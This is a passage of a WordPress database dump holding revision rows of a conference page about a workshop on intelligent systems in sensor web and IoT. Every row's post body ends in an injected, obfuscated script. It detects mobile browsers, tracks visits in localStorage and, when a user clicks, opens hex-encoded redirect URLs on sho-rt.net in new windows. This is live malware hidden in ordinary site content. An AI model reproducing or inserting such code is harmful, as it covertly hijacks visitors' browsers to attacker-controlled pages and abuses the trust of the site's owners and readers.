_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:11:22','2022-12-06 05:11:22','',3386,'https://gsw2023.com/?p=3408',0,'revision','',0),
(3409,1,'2022-12-06 05:11:55','2022-12-06 05:11:55','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"4x3\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:11:55','2022-12-06 05:11:55','',3386,'https://gsw2023.com/?p=3409',0,'revision','',0),
(3410,1,'2022-12-06 05:12:15','2022-12-06 05:12:15','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"6x8\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:12:15','2022-12-06 05:12:15','',3386,'https://gsw2023.com/?p=3410',0,'revision','',0),
